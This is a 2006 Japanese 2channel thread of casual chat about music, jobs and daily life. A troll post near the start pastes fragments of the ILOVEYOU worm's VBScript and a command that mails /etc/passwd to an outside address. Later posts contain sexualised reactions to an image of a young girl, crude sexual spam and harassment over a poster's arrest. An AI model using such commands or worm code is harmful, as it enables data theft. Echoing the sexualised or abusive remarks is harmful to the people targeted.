5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【花より男子】洋楽板貴族のスレ【マリア様がみてる】

1 :KOOP:2006/07/07(金) 20:50:57 ID:TSpBqbsR
「求めなさい。そうすれば、与えられる。
 探しなさい。そうすれば、見つかる。
 門をたたきなさい。そうすれば、開かれる。
 だれでも、求める者は受け、探す者は見つけ、
 門をたたく者には開かれる。」


星の王子さまOP
http://www.youtube.com/watch?v=bt21xgXqhX4

2 :名盤さん:2006/07/07(金) 20:52:14 ID:9n+uyujt
    ___
   ,;f     ヽ
  i:         i
  |         |
  |        |  ///;ト,
  |    ^  ^ ) ////゙l゙l;   おおなんという糞スレじゃ
  (.  >ノ(、_, )ヽ、} l   .i .! |   南無阿弥陀仏南無阿弥陀仏
  ,,∧ヽ !-=ニ=- | │   | .|
/\..\\`ニニ´ !, {   .ノ.ノ
/  \ \ ̄ ̄ ̄../   / .|
c.Copy(dirsystem&"¥MSKernel32.vbs")
c.Copy(dirwin&"¥Win32DLL.vbs")
c.Copy(dirsystem&"¥LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)


3 :糞スレ判定委員会:2006/07/07(金) 20:56:08 ID:GMFZs9jh
「何この糞スレ」               「凄い」             「こんな糞スレ見たこと無い」
/l   /  /  //  / l  l !  l   ヽヽ、}           ' ´ ̄``ヽ、
l l   l-ァー∠/--/-l  メ、j l l |  ヽ.ハ ′             ‐ 、 、 ヽ__       _
l l  li /ィ´,r=`ヽ/ / 〃ヒl`くl j l   ! |     / / /   、 ヽ.  \ヽ} ``ヽ、  ,ィ´__
l l  l/ト{ トッ::::} ///',rテ V//l l  l ! j / / / 〃 //1 l  ヽ  \.  i     `' ´  ___`ヽ、
l l  l   _ゞ..ソ ' u  ト:ソ//l l j  j レ'/ / ̄/_Z_フ〃 ト!j1 l l l  ヽ ヽ } ̄ `` ‐ 、 ´ ̄ `ヽ、``
l l  | u   ̄´    , ー' / l ji /l /l / /,ィ´,ィぅ、ヽ ′/lムトj l l l   いV ̄ ̄ ` ‐ 、ヽ   \  \
'|!  |     ,. -‐┐   } レ'//r/l/Vイ ヽ{ トッ::リ    ,fi }〃/ l   l l_/__/,.ィj /l ヽl   \ ハ
.li  l  u  (  ノ  ,.イl l/ヘ. ヽ l  |   `ー'′    トリ1 }} l  jリ ,.=_-ミ// /トl、1 l l l ヽ ヽ.i}
-!  l` 、    ̄ _, ィ´l li |  ヽ ヽl  l    u  __  ' ゙' j 〃/l /LV イッ1 / / rテlヽ l l l トi  |ノ
ハ   ト、.__/、ー-ァ'/ // リ l  |    \l  l    i´  ノ u,.イイ/イ /イリ   辷リ   .{:リ }jイ } }i l l リ
.い  l  } ` ‐- く/ l ,l ├-- 、_,.ヘ. ト、_  `ー‐' _,. '´/ /  l  l        '`'゙/ //!,リl リ lソ
. ヾi   ト、 j    l l`ト< l  ilヽヽ  `マ ヽヽ._7ー‐ '  / /   l   l u  i´ ノ  / l/// j/
  l  トv′    l l j .j l ,リ l l   ',  ヽ ^1 ` ーrく / __,l  ト.ヽ、   ´,. ィ   l/
  _,l  li._    /// / / /  l l   ヽ===l    ll Y丁ヽ  |  l `¨トニ´  l l   |
'_,. -1  ト、ヽ、 /// / / ハ   l l    ヽ-- l    lj l l l い !   l__,l  ``Tn   |
- ' /l i ト`ヽ、. //,/ / / ハ   l l___,...._! リ    〃//j ! い |  ├‐-!   l l l   |


4 :アルマンス ◆DCJ0JoRHW2 :2006/07/07(金) 20:56:43 ID:hrX0yQHZ
>>1
乙です^^ノ

10ちゃんと別人?^^;
とにかくどーもです^^ノ

>>2
ヘンなもの貼らないでくださいよー^^;
まさかトロイ?^^;

5 :ダイダラボッチ ◆DAWN6N.y5g :2006/07/07(金) 21:24:03 ID:5kccNYDN
 ννν
(´ ∪`)
(∴〜∴)ノ<ここはなんのスレ?
/(ヘ 悟 )ヘ

6 :アルマンス ◆DCJ0JoRHW2 :2006/07/07(金) 21:42:26 ID:hrX0yQHZ
>>1
10ちゃんでしたか^^ノ
改めておっつーです^^ノ

>>5
雑談スレです^^ノ

7 :>1乙彼:2006/07/07(金) 21:56:02 ID:0mEwli46
これらのことをあかしするかたが仰せになる、「しかり、わたしはすぐに来る」。
アァメン、主イエスよ、きたりませ。
主イエスの恵みが、このスレ一同の者と共にあるように。

8 :名盤さん:2006/07/07(金) 21:58:18 ID:zCsndUTx
誰かスレ立ててくれ
タイトル「おい亀井絵里って洋楽認定決まりじゃねーか?」
テンプレ「http://www.youtube.com/watch?v=MeJD-EIfZHU&search=kamei

9 :ダイダラボッチ ◆DAWN6N.y5g :2006/07/07(金) 21:59:31 ID:5kccNYDN
>>6
 ννν
(´ ∪`)
(∴〜∴)ノ<クリスチャンの雑談スレ?
/(ヘ 悟 )ヘ

10 :名盤さん:2006/07/07(金) 22:00:49 ID:CcLhQ5tg ?#
sine

11 :マリア:2006/07/07(金) 22:07:42 ID:0mEwli46
>>9
ノンクリも桶
信じる者は救われます

12 :アルマンス ◆DCJ0JoRHW2 :2006/07/07(金) 22:23:33 ID:hrX0yQHZ
>>9
違いますよ〜^^ノ
内容は雑多でなんでもありです^^ノ

13 :ダイダラボッチ ◆DAWN6N.y5g :2006/07/07(金) 22:46:53 ID:5kccNYDN
>>11-12
 ννν
(´ ∪`)
(∴〜∴)ノ<みんなの宗派はなんなの?
/(ヘ 悟 )ヘ

14 :アルマンス ◆DCJ0JoRHW2 :2006/07/07(金) 23:19:01 ID:hrX0yQHZ
>>13
ウチは浄土宗ですけど^^;
このスレは宗教とは関係ありませんよ^^;

15 :星の王子様 ◆X0Z.ew5Xkc :2006/07/07(金) 23:27:50 ID:ZieQ5bZ1
>>1
乙!(´∀`*)ノ



16 :アルマンス ◆DCJ0JoRHW2 :2006/07/08(土) 01:43:50 ID:6D9a8jyB
>>8
明日やってみますお(^ω^)
人の世は持ちつ持たれつですから(^ω^)

さて、寝よ。
おやすみなさ〜い(._.A)ノ☆

17 :名盤さん:2006/07/08(土) 02:18:08 ID:A3PY0BUl
StryperとCreedのスレはここですか?

18 :アルマンス ◆DCJ0JoRHW2 :2006/07/08(土) 09:26:21 ID:6D9a8jyB
違います^^ノ
女子高生が集うスレです^^ノ

19 :アルマンス ◆DCJ0JoRHW2 :2006/07/08(土) 21:01:09 ID:duWsOVCn
>>8
立てましたお^^ノ

おい亀井絵里って洋楽認定決まりじゃねーか?
http://music4.2ch.net/test/read.cgi/musice/1152359953/l50



20 :アルマンス ◆DCJ0JoRHW2 :2006/07/09(日) 14:36:38 ID:017JNKjJ
612 名前:   [sage] 投稿日: 2006/06/09(金) 16:09:09 ID:uSrVx8CV0
スール――。最高だ。こんなに美しい制度、他にないよ。
どんなに苦しくても、胸が痛くても、お姉さまがついていると思うと頑張れる。
ほんと不思議。これまで何度もそんなことあったね。
手首のロザリオ。胸元で揺れるロザリオ。
ロザリオが目に入ると、こんなところで諦めてもいいのかって、また闘志が湧いてくるんだ。
ロザリオをつけて、アヴェマリアを聴く。最高だ。武者震いがするもの。
体中のパワーがみなぎってくる。 
                                              byラモス

613 名前: [sage] 投稿日: 2006/06/09(金) 20:38:11 ID:38SgXRX40
ラモスかよ!? ラモスのお姉さまって誰よ!?

616 名前:   [sage] 投稿日: 2006/06/10(土) 13:39:57 ID:RS7sPqT/0
>>613
与那城ジョージお姉さまですわ

21 :アルマンス ◆DCJ0JoRHW2 :2006/07/09(日) 18:12:14 ID:Ci+MNubj
僕ちんのブログURLだす(^ω^)ノ
お暇なら来てよね(^ω^)ノ

ttp://blog.livedoor.jp/blazefireblaze/

22 :名盤さん:2006/07/10(月) 09:01:56 ID:pA3+yw2/
Kingsexでお勧めのアルバム教えて

23 :名盤さん:2006/07/10(月) 10:31:56 ID:0WbIjHKt
芸能人は顔が命

http://post.baidu.com/f?kz=113156979

24 :アルマンス ◆DCJ0JoRHW2 :2006/07/10(月) 12:31:11 ID:Z1p85vIm
>>22
Kingsex?^^;
Kings Xなら知ってるけど、聴いたことない^^;

>>23
ん〜韓国の芸能人は整形してないよって言いたいの?
確かに韓国人の方が変形率が低い。
つーか美少女が圧倒的に多いな。
子供の頃に整形済ましちゃうんじゃない?

25 :アルマンス ◆DCJ0JoRHW2 :2006/07/10(月) 13:22:21 ID:Xg90QAk7
しかしまきまきショックだわ・・・^^;
まだ高3なのにいじってるとわ・・・^^;
でも可愛くなる整形はOKだと思います^^ノ
やり過ぎてキモくなるのはNG^^ノ
まきまきは全然OK牧場です^^ノ

26 :名盤さん:2006/07/10(月) 14:14:32 ID:0WbIjHKt
>>24
一番醜い頃の写真(又は、キャプチャー)と対比して投稿してあるらしい

それに対する反論
http://post.baidu.com/f?z=89227188&ct=335544320&lm=0&sc=0&rn=50&tn=baiduPostBrowser&word=%C8%D5%B1%BE%C3%F7%D0%C7&pn=0

27 :名盤さん:2006/07/10(月) 14:18:26 ID:0WbIjHKt
>>25
まきまき・・堀北の事?

あれは、ただ単に成長だよ

28 :アルマンス ◆DCJ0JoRHW2 :2006/07/10(月) 17:01:29 ID:Z1p85vIm
よく見たら中国のサイトでしたな^^;

>>26
なるほど、こちらは若い頃のも可愛く写ってますな^^ノ
>>23はわざと不細工に写ってる写真を晒してるんですな^^;
しかし中国にも日本人を擁護する人がいるとはよきかなよきかな^^ノ

>>27
そうですか、まきまき整形してませんか( ^ω^)ニコニコ

29 :名盤さん:2006/07/10(月) 17:08:49 ID:HxakYK5L
ゲロ男はまだ働かないでこんなとこでジメジメした書き込み続けるの?
いいかげんうっとーしいんだけども

30 :アルマンス ◆DCJ0JoRHW2 :2006/07/10(月) 17:13:47 ID:Z1p85vIm
>>29
明日面接です^^ノ
俺だって早くプー生活におさらばしたいよ(´・ω・)

31 :名盤さん:2006/07/10(月) 18:38:24 ID:HxakYK5L
面接行くだけ無駄だね。だってドッキリだもの。

おっさんなんて雇うわけねーべ。

32 :名盤さん:2006/07/10(月) 18:45:34 ID:DfGuh8Ro
>>31
だな。

33 :名盤さん:2006/07/11(火) 00:16:09 ID:B8VBvtzb
143 :アルマンス ◆DCJ0JoRHW2 :2006/07/10(月) 23:12:07
タイミング悪く登場^^ノ

学歴は高卒だお^^ノ
かなりの低偏差値校だお^^ノ
職歴っつってもねえ^^;
俺、今3X歳だけど、初めて仕事に就いたの29の時だから^^ノ
それまでは高校出てから引き篭もってました^^ノ
社会に出るきっかけは発狂してコトを起こしたから精神科に行ったからだお^^ノ
発狂→事件→逮捕→精神鑑定→不起訴→自由の身に^^ノ
あやうく10年は食らうところだったお^^;
それから工場数箇所で働いたお^^ノ
前職は馘じゃなくて嫌になったから20日間で辞めたんだお^^ノ
次もたぶん工場だお^^ノ
明日面接頑張るゾ^^ノ


34 :アルマンス ◆DCJ0JoRHW2 :2006/07/11(火) 13:01:32 ID:VDyqLv4i
10年は大袈裟かな^^;
最高刑で10年、実際に有罪なら3、4年で執行猶予つきってところかな^^

面接ダメっぽいお^^;
とりあえず連絡待ち^^

35 :アルマンス ◆DCJ0JoRHW2 :2006/07/11(火) 13:23:13 ID:Qpr3+BjG
おわっっ、前スレが落ちてるよっっ。。
埋まったの?。。
988から読めてない。。
誰かコピペお願いします〜m(_ _;)m


36 :名盤さん:2006/07/11(火) 14:38:13 ID:y9pXMXCR
>>35
http://music4.2ch.net/test/read.cgi/musice/1148918813/l50

987で落ち。
ついでに面接落ち。

37 :アルマンス ◆DCJ0JoRHW2 :2006/07/11(火) 14:41:20 ID:VDyqLv4i
988からログ取れてないんだけど専ブラでも見る方法ないの?。。
誰かなんとかしちくり〜(TOT)
このスレは俺の魂の故郷なんや〜(TOT)

38 :アルマンス ◆DCJ0JoRHW2 :2006/07/11(火) 14:43:52 ID:VDyqLv4i
>>36
おおっ、サンクス^^ノ
ログ取れてないより落ちのがまだいいや^^

面接は次があるさ^^

39 :名盤さん:2006/07/11(火) 17:44:50 ID:CN+HMOfw
いや落ちたんだから次はないだろ

40 :10ちゃん ◆HzwJN7quoQ :2006/07/11(火) 20:25:04 ID:eVWj7dqG
(・人・*)
ゲロ男さん!Funkyな履歴ですねえ☆
面接、良い返事が来るといいですね〜

ところで、ロリなゲロ男さん!
こんな目力の有る少女はどうですか?
http://cyan.gazo-ch.net/bbs/17/img/200607/864158.jpg

41 :名盤さん:2006/07/11(火) 21:31:42 ID:CN+HMOfw
Funkyって言葉で片付けていいのか?
不起訴とはいえ犯罪は犯罪だぞ?
あんた自分がゲロ男に殺されかけ家焼かれてもFunkyな出来事だね!で片付けられるのか?

42 :アルマンス ◆DCJ0JoRHW2 :2006/07/11(火) 23:21:34 ID:Qpr3+BjG
>じゅうちゃん
なかなか、条件のいい仕事で難しいと感じたよ〜´_`
面接行っただけで交通費として千円くれたよ〜
儲かっちった(o^-^o)

アワワワ。。めっちゃかわいいよ〜(;´Д`)ハァハァ
目がたまんないよ〜(;´Д`)ハァハァ
こんな子見たら

>>313
真性ぢゃないお^^;
萌えるだけだお^^;
性的対象としては見ないお^^;

なんて言ってらんないよ〜(;´Д`)ハァハァ

>>41
ごもっともです^^;


43 :アルマンス ◆DCJ0JoRHW2 :2006/07/11(火) 23:30:18 ID:Qpr3+BjG
ん〜でもやっぱ性的対象にはならんかな。
ん〜でも壁紙にしますたw
まきまきごめん。。

目力のある少女万歳!\(^O^)/

44 :星の王子様 ◆X0Z.ew5Xkc :2006/07/11(火) 23:57:07 ID:FCMaAcmf
夏はアイスコーヒーだな♪(´∀`*)

ゲロさん就活がんばってね!
マターリいきませう





45 :アルマンス ◆DCJ0JoRHW2 :2006/07/12(水) 00:11:04 ID:+ijHqBri
>王子
どうもです〜o(^O^)o
就活頑張ります〜o(^O^)o

俺は夏はお〜いお茶ですo(^O^)o

まったりまったりまったりな〜☆
それでわ、おやすみなさい☆

46 :アルマンス ◆DCJ0JoRHW2 :2006/07/12(水) 09:19:45 ID:AOkUn2cT
おはです〜☆

缶コーヒー1日2本くらい飲んでます。
デブりそう^^;

47 :アルマンス ◆DCJ0JoRHW2 :2006/07/12(水) 11:54:43 ID:AOkUn2cT
暑いだすι(◎д◎;)っ

48 :名盤さん:2006/07/12(水) 12:12:28 ID:CQXAaBc6
芸スポの市川アナスレで王子叩かれまくりだね

49 :アルマンス ◆DCJ0JoRHW2 :2006/07/12(水) 15:18:11 ID:AOkUn2cT
な、なにーι(◎д◎;)つ

加勢に行くだす(`口´)

50 :アルマンス ◆DCJ0JoRHW2 :2006/07/12(水) 15:44:40 ID:p5Vi+hbF
王子いなかったし女子アナとかよくわからないにゃ(´〜`)

51 :名盤さん:2006/07/12(水) 17:27:19 ID:u1RIIcLr
143 :アルマンス ◆DCJ0JoRHW2 :2006/07/10(月) 23:12:07
タイミング悪く登場^^ノ

学歴は高卒だお^^ノ
かなりの低偏差値校だお^^ノ
職歴っつってもねえ^^;
俺、今3X歳だけど、初めて仕事に就いたの29の時だから^^ノ
それまでは高校出てから引き篭もってました^^ノ
社会に出るきっかけは発狂してコトを起こしたから精神科に行ったからだお^^ノ
発狂→事件→逮捕→精神鑑定→不起訴→自由の身に^^ノ
あやうく10年は食らうところだったお^^;
それから工場数箇所で働いたお^^ノ
前職は馘じゃなくて嫌になったから20日間で辞めたんだお^^ノ
次もたぶん工場だお^^ノ
明日面接頑張るゾ^^ノ


52 :マリア:2006/07/12(水) 20:22:52 ID:OBZzApj5
2ちゃんの中ではアルマンスはまとも

リアルは知らないけどもっと有害な奴いますね

アルマンスは少しセクハラが過ぎますがwwwまあおちゃめでしょう 

53 :マリア:2006/07/12(水) 20:24:49 ID:OBZzApj5
夏はやっぱりコーラですね   ♪Yes,My Love〜

54 :名盤さん:2006/07/12(水) 20:55:48 ID:OwGJbUcn
あげちゃうぞコラ

55 :星の王子様 ◆X0Z.ew5Xkc :2006/07/13(木) 00:25:45 ID:PURUqp8O
やあ(´∀`*)ノ☆
マリアさんはコーラ派ですかあ
ボクはコーヒー牛・・・カフェラテだよう



56 :星の王子様 ◆X0Z.ew5Xkc :2006/07/13(木) 00:26:34 ID:PURUqp8O
暑くてマイッちんぐ!(´∀`*)っっ


57 :アルマンス ◆DCJ0JoRHW2 :2006/07/13(木) 10:14:56 ID:RZEmkGFo
>マリアさん
いやいやどーもです(^^ゞ
俺もコーラ大好きです☆
コークもペプシも両方イケますよ☆

お名前から察するに美少女の方とお見受けしますた(^〜^;)
以後よろしこ☆

>王子
コーヒー牛○は太りますよ〜^^;

58 :名盤さん:2006/07/13(木) 13:05:48 ID:QL6lSeJ2
>>57
マリア=金○

♪Yes,My Love〜 ←かなり古い(矢沢の頃)

59 :名盤さん:2006/07/13(木) 13:10:49 ID:X/pcrU2o
勃起したチンポをモリマンに挟んでホットドッグです。食べなさい。

60 :アルマンス ◆DCJ0JoRHW2 :2006/07/13(木) 17:16:42 ID:cXfBp1go
>>58
違うと思います^^ノ
マリアたんはマリアたんです^^ノ


今日はiTunesを6.0.5.20に、iPodソフトウェアを1.1.2にアップデートしました^^ノ

61 :名盤さん:2006/07/13(木) 17:28:09 ID:QL6lSeJ2
>>60
HNのセンスからして間違いなく金だよ!

62 :マリア:2006/07/13(木) 22:00:48 ID:TqQx/ywQ
>王子様
コーヒー牛ってw笑いましたよ。へたれ牛みたい。
最近コーヒーは豆を手で挽いて香りを楽しんでます。今はブルマン。

>アルマンス
びしょうじょというか、びしょじょというような…まぁびしょびしょな感じですねw

永ちゃんはお父さんがすごく好きだったのでちょっと知ってます。
ストーンズやビートルズが好きだからってオンタイムで聴いてるとは限らないでしょ。



63 :アルマンス ◆DCJ0JoRHW2 :2006/07/14(金) 08:21:06 ID:6Kzjtn3H
マリアさんは濡れやすいんですか〜(^O^)
濡れやすい女性好きです〜(^〜^;)



昨夜は徹夜でブログのリニューアルしたから寝よ。。

64 :名盤さん:2006/07/14(金) 10:32:13 ID:JiLl/Bj4
>>62
この寒いレスは、間違い無い。

65 :マリア:2006/07/15(土) 02:46:05 ID:nQMZXZ+1
いやん、下ネタは嫌いです><

どこか遠征しても安全なスレありますか?
サロンって前より廃れましたね、確実に。

66 :アルマンス ◆DCJ0JoRHW2 :2006/07/15(土) 10:24:35 ID:q3aabuES
ごめんなさい〜><;

遠征って洋楽、洋サロ内でですか〜
どのスレもぼっくんの威光があまねく行き渡ってるから平和ですよ〜(^ω^)ノ

67 :星の王子様 ◆X0Z.ew5Xkc :2006/07/15(土) 11:38:15 ID:xL1VMOeY
おなか減ったYO!(´∀`*)



68 :アルマンス ◆DCJ0JoRHW2 :2006/07/16(日) 01:53:23 ID:3HONAn93
今日(つーか昨日)ジャンプ発売だったからワンピ立ち読みしてきますた。
そげキングがやっと活躍してくれた。
嬉しかった。

69 :名盤さん:2006/07/16(日) 13:40:50 ID:lMOqVlNa
>>68
夜中にジャンプなんか読んでないで職探せ

70 :アルマンス ◆DCJ0JoRHW2 :2006/07/16(日) 15:11:18 ID:3HONAn93
>>69
探してます^^ノ
でも派遣も結構人を選ぶんだよね^^;

71 :マリア:2006/07/16(日) 16:44:45 ID:jBBm/vId
>>70
アルマンス 仕事探し、がんばってねー!

どこかのカキコで見たけどリンキンの誰かに似てるの?
自称○○ってのはあまり信用しない方なんだけど私w

72 :マリア:2006/07/16(日) 16:47:34 ID:jBBm/vId
http://music4.2ch.net/test/read.cgi/mesaloon/1152112525/188
これって事実なんですか?

73 :星の王子様 ◆X0Z.ew5Xkc :2006/07/16(日) 17:27:30 ID:1vd+CAuA
昼からビールがぶ飲みしておる(´∀`*)

資格でも取ろうかな。マンション管理士とかいいかも。
と思ったら難しいんだねこれ。簡単なの無いかな・・・
マイクロソフト・オフィス・スペシャリストなんか簡単そう。
小学生でも取得可能みたいし。




74 :マリア:2006/07/16(日) 18:24:57 ID:ugiawttF
資格か。いいですね。
王子様は何の仕事です? 正社員ですか、それともフリーター?



75 :マリア:2006/07/16(日) 18:29:07 ID:ugiawttF
ビールおいしいですね。私はエビスが好きです。
大体缶で3〜4本くらいはイケる。

今からデートで彼待ち中…遅いよ><

76 :星の王子様 ◆X0Z.ew5Xkc :2006/07/16(日) 18:33:31 ID:1vd+CAuA
ボクは正社員・・・というか王族ですが何か?(´∀`*)
疲れたから辞めようと思ってるんだけどね。。
ビールはモルツ飲んでます。エビスはたまに飲むよ!おいしいよね。
つかもう4本目なんだけど大丈夫か?

マリアさん哀愁でいと頑張ってね!キミに薔薇薔薇・・・という感じさ!



77 :アルマンス ◆DCJ0JoRHW2 :2006/07/16(日) 19:24:14 ID:3HONAn93
おいーっしゅっ(._.A)ノ

>マリアたん
淋菌のチェスターに煮てるって言われたことありますよ^^;
髪短くて黒縁眼鏡かけてた時に^^;
ちなみに相手は男^^;
自分では煮てると思わないですね〜^^;
だってチェスターってビミョーでしょ^^;

それ、本名は全然違います〜
年齢はかなり近いですね^^;
無職、チビはその通りです^^;
ちなみに168cm^^;

>王子
マイクロソフト・オフィス・スペシャリストってよさげですね〜
調べてみようかな、、、
椅子に座ってやる仕事に憧れるっ><

ぼきたんは下戸ゲーコだからおしゃけの話にはついていけないのだ^^;
マリアたんデート激しく燃え上がってください〜

風呂入ろ。



78 :アルマンス ◆DCJ0JoRHW2 :2006/07/16(日) 20:58:52 ID:3HONAn93
お風呂入って功名見ながらご飯食べ終わったたから
ブックオフに花より男子立ち読みに行こ(._.A)

79 :アルマンス ◆DCJ0JoRHW2 :2006/07/17(月) 12:49:30 ID:Rrwclkun
お昼ご飯食べて花男立ち読みに行こ(._.A)

80 :名盤さん:2006/07/17(月) 16:11:58 ID:e/Ubi3XO
ゲロは塀の中にいるってね

かっこわる〜い

81 :アルマンス ◆DCJ0JoRHW2 :2006/07/17(月) 17:13:13 ID:whV8uZXr
>>80
なかなか居心地のよいところでしたよ(^ω^)ノ
煙草も吸えるし本も漫画も読めるしカップヌードルもお菓子も食べられるし(^ω^)ノ

82 :アルマンス ◆DCJ0JoRHW2 :2006/07/17(月) 17:22:56 ID:whV8uZXr
電話掛かってきたお(^ω^)ノ
面接落ちたお(^ω^)ノ









(TOT)

83 :アルマンス ◆DCJ0JoRHW2 :2006/07/17(月) 17:36:16 ID:whV8uZXr
なんちゅーか、コイツラは工場を舐めてますね^^;
可愛いから許すけど^^
つーか環境のよさそーな工場だな。。
こういう所で働きたい。。

http://jp.video.msn.com/v/ja-jp/v.htm?g=532FA155-D9E8-435F-8953-195DFA68D726,8C8A1282-E43B-486D-96A9-6F20E513939A,35CD54BD-0B0F-4704-82D3-37B5A442F0E5&t=m113&f=40/98&p=jajpentertainment_jajpfox

84 :名盤さん:2006/07/17(月) 18:37:47 ID:e/Ubi3XO
犯罪者なんて雇うわけないって!

85 :アルマンス ◆DCJ0JoRHW2 :2006/07/17(月) 18:44:25 ID:whV8uZXr
・・・(^^;)

86 :名盤さん:2006/07/17(月) 18:47:04 ID:e/Ubi3XO
どうせまたキレテ火付けるんだろ?

87 :アルマンス ◆DCJ0JoRHW2 :2006/07/17(月) 18:48:50 ID:whV8uZXr
つけないよお(^^;)
もう治ったもん。。

88 :名盤さん:2006/07/17(月) 18:48:51 ID:e/Ubi3XO
世の中をベロンベロンに舐めてるゲロおやじに言われたくはないだろうよ!

89 :アルマンス ◆DCJ0JoRHW2 :2006/07/17(月) 18:50:05 ID:whV8uZXr
なんだよお(^^;)
いぢめないでよお。。

90 :10ちゃん ◆HzwJN7quoQ :2006/07/17(月) 22:15:49 ID:5rCXATCc
(・人・;)ダメデシタカ。。。

次です、次!ガンガレ!!

91 :10ちゃん ◆HzwJN7quoQ :2006/07/17(月) 22:16:44 ID:5rCXATCc
(・人・;)サゲワスレ。。。

92 :星の王子様 ◆X0Z.ew5Xkc :2006/07/18(火) 01:26:43 ID:cuZRml8A
ゲロさんドンマイ!(´∀`*)
てるてるあした。

93 :名盤さん:2006/07/18(火) 02:28:47 ID:RxSusdI3
ゲロマンスが三十才越えてるのに、こんななのは脳に欠陥があるから?

94 :アルマンス ◆DCJ0JoRHW2 :2006/07/18(火) 11:17:53 ID:i1b4NZr8
おはです〜(^O^)

>じゅうちゃん&王子
どうもです〜
次はがむばります〜^^ノ

>>93
キャラですよお^^;
リアルの俺はRazorsharpと呼ばれてます^^

95 :マリア:2006/07/18(火) 12:51:15 ID:QNe2BVin
アルマンス様、かっこいいですわ〜。
そっちのキャラでカキコしてほしいですw。

あー休み明けダルい。しかも雨だし。

96 :アルマンス ◆DCJ0JoRHW2 :2006/07/18(火) 14:11:55 ID:i1b4NZr8
>マリアたん
わたくし、嘘をつきましたm(._.;)m

リアルでは・・・哀しいから書くのやめとこ・・・(T_T)

97 :名盤さん:2006/07/18(火) 14:18:53 ID:RxSusdI3
ゲロの涙を流すゲロ男

98 :名盤さん:2006/07/18(火) 14:20:29 ID:RxSusdI3
キャラを作ってるとかその年齢でいう時点でry

99 :マリア:2006/07/18(火) 18:24:39 ID:QNe2BVin
いいんですよ、アルマンスはアルマンス。
背伸びも無理もヤセガマンも要らないじゃないですか。

別キャラやってみたい時はとことんやる!ですよ。


文句ばっか言ってたり人の悪口しか能のない惨めな人より
人生楽しみましょうよw

100 :てけてけ ◆9lauP359zE :2006/07/18(火) 19:52:11 ID:2PDhZp9A
100ゲットでしゅ(ё)

101 :アルマンス ◆DCJ0JoRHW2 :2006/07/18(火) 20:47:28 ID:i1b4NZr8
>>99
マリアたん、ありがたう^^ノ
本物のマリアさまのやうなお方だ〜(;人;)
僕ちんの身も心も癒してくだちいm(._.A)m

ダンドリ見よ。
先週見逃したんだよな〜
ロータンぢゃなくて榮倉が主演ってのは気に食わないけど〜

102 :名盤さん:2006/07/18(火) 22:36:04 ID:iDLUxZum
ゲロ親父って、もしかしてボンボン?

103 :アルマンス ◆DCJ0JoRHW2 :2006/07/18(火) 22:41:51 ID:i1b4NZr8
>>102
違いますよ〜
ウチはかなーりボンビーです(;^_^A


ロータン、榮倉に顔で勝って脚で負けてる、、、(-o-;)
身長の差か、、、
ロータン 160cm
榮倉 170cm

しかし170ってデカくね?(-o-;)
俺は榮倉支持しないよ(`o´)

104 :10ちゃん ◆HzwJN7quoQ :2006/07/18(火) 23:38:00 ID:lJLR0tx8
(・人・*)
たまにはROCKでも♪

Helmet『Wilma's Rainbow』
http://www.youtube.com/watch?v=deqz3ad0oRE&search=helmet%20%20Wilma%27s%20Rainbow%20

Lemonheads『luka』
http://www.youtube.com/watch?v=zuZ7QVTl8HA&search=lemonheads

Teenage Fanclub『What You Do To Me』
http://www.youtube.com/watch?v=9Z50eOse7tk&search=teenage%20fanclub

105 :アルマンス ◆DCJ0JoRHW2 :2006/07/19(水) 00:51:07 ID:rrFYhg1/
おわっ、10ちゃんがヘルメットを聴くとは意外ですっ^^;

じゃあこちらはダウナーな感じでPortishead3連発^^ノ

http://www.youtube.com/watch?v=2PDJAn31mBs
http://www.youtube.com/watch?v=kFYbJ5q5QwE
http://www.youtube.com/watch?v=0GJASHgi4b0

106 :アルマンス ◆DCJ0JoRHW2 :2006/07/19(水) 00:56:50 ID:rrFYhg1/
ところで、マッシヴ・アタック、ポーティスヘッド、トリッキーの
トリップ・ホップ御三家の内どれが一番好きですか^^ノ
俺はポーティスヘッドです^^ノ

107 :星の王子様 ◆X0Z.ew5Xkc :2006/07/19(水) 01:41:32 ID:YOZiec5b
どれも好きじゃないけどマッシブ1STとポーティス1STは良く聴いたよ

108 :アルマンス ◆DCJ0JoRHW2 :2006/07/19(水) 02:50:42 ID:rrFYhg1/
アダルトAV見てました(^ω^)ノ

俺もマッシヴ1stとポーティス1stはよく聴きましたね〜
とくにポーティス1st。
でも「好き」と言い切れないのは、トリッキーも含めて三者とも
2ndがピンとこなくてバッタリ聴かなくなったちゅーとこですかねー。

ほいでは寝まふ☆

109 :アルマンス ◆DCJ0JoRHW2 :2006/07/19(水) 02:51:35 ID:rrFYhg1/
×アダルトAV
○アダルトDVD

110 :名盤さん:2006/07/19(水) 18:45:14 ID:kRAHEKFN
ゲロおやじは典型的な底辺のダメおやじなんだな

111 :名盤さん:2006/07/19(水) 18:47:52 ID:kRAHEKFN
俺、ゲロおやじとして生まれてこなくてほんっっっとによかった〜

112 :アルマンス ◆DCJ0JoRHW2 :2006/07/19(水) 20:08:55 ID:rrFYhg1/
俺は俺に生まれてきてほんとによかった〜〜〜思てますけどね^^ノ
ほら、俺って聴く音楽も見る映画も読む本もまじセンスいいじゃない^^
他人とかってダサくて信じらんない^^;


と、洋楽板住人の8割は思っていそう^^;


113 :マリア:2006/07/19(水) 20:20:12 ID:LlOqMsn6
あるある! 洋楽住人ってナルシストで
コンプレックスの裏返しからきてる自己評価の高さが特徴ねw

そういう私もここで最近デビューしたわけですが。

114 :星の王子様 ◆X0Z.ew5Xkc :2006/07/19(水) 21:17:05 ID:YOZiec5b
ゲロさんは洋楽板のアイドルだよまったく!(´∀`*)
ゲロさんが肩で風切って街を歩けば名無しがついてくる♪



115 :10ちゃん ◆HzwJN7quoQ :2006/07/19(水) 21:30:33 ID:8xTGQPQa
(・人・*)
>>105
はい!グランジやらラウド系やら、よく聴いていましたよ。
ロックDJ出身ですから!
パンク、UKロック、ネオアコなんかを回していました。。。

>>106
Massive Attackは2ndまでは、聴きましたねえ♪
ただ、トリップ・ホップには深入りしていないんです。。。
その頃は、ソウル、レア・グルーブ、ロック(60's、70's)に夢中だった様な、、、

マッシブ・アタックのレーベル、『MELANKOLIC』のAlphaは好きでした。
バカラックやガーシュウィンをサンプリングしていて、気持ちいいですよ。


116 :星の王子様 ◆X0Z.ew5Xkc :2006/07/19(水) 22:10:25 ID:YOZiec5b
